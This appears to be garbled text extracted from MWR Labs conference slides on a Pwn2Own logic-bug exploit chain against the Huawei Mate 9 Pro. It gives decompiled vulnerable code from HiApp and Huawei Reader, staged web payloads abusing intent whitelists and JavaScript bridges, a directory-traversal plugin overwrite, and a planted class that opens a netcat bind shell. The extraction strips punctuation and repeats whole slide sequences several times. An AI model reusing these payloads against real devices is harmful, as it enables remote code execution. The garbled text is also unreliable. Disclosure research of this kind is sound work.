((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Mate 9 Pro
6
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PWN2OWN
Execute arbitrary instructionshellip
hellipretrieve sensitive informationhellip
hellipa full sandbox escape is requiredhellip
hellipwithout any user interaction
8
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Pwn2Own Categories and Choice
9
PWN2OWN ndash Results
10
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
